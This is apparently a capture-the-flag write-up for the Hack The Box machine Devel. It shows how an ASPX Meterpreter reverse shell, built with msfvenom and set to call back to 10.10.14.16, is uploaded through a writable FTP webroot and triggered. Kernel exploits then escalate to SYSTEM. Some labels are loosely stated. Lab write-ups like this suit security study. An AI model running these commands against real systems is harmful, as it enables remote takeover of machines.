10.10.10.5 - Devel - Windows 7

ASPX reverse shell and Metasploit Enumeration

Summary: vulnerable software : MSII/7.5 ftp webroot exposed and writable system vulnerable : 10.10.10.5 vulnerability explanation : privilege escalation: kernel pool overflow in Win32k severity : critical

Enumeration:

Nmap shows that Microsoft FTP server is used to provide web content of the wwwroot folder. This can be dangerous if the server allows read and write access to its folder. It seems like it does in this case:

Filezilla showing uploaded shell.aspx crafted by an attacker.

Instructions for creating a shell:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.16 lport=4443 -f aspx > shell.aspx

Once we trigger the uploaded shell we get a connection back from the server:

curl -k http://10.10.10.5/shell.aspx

Next we run local_exploit_suggester to find possible kernel privilege escalation methods on this Windows 7 Box.

meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 0
Meterpreter : x86/windows

Metasploit exploit_suggester came up with few exploit matching the architecture of the victim:

Metasploit local enumeration

Due to unpatched system being put in place many of the above suggestions were successfully executed on the target providing potential attacker with the NT_AUTHORITY level account:

MS16/075 - Also known as juicy potato
MS13-053

Screenshot from 2019-02-18 22-46-45

MS14_058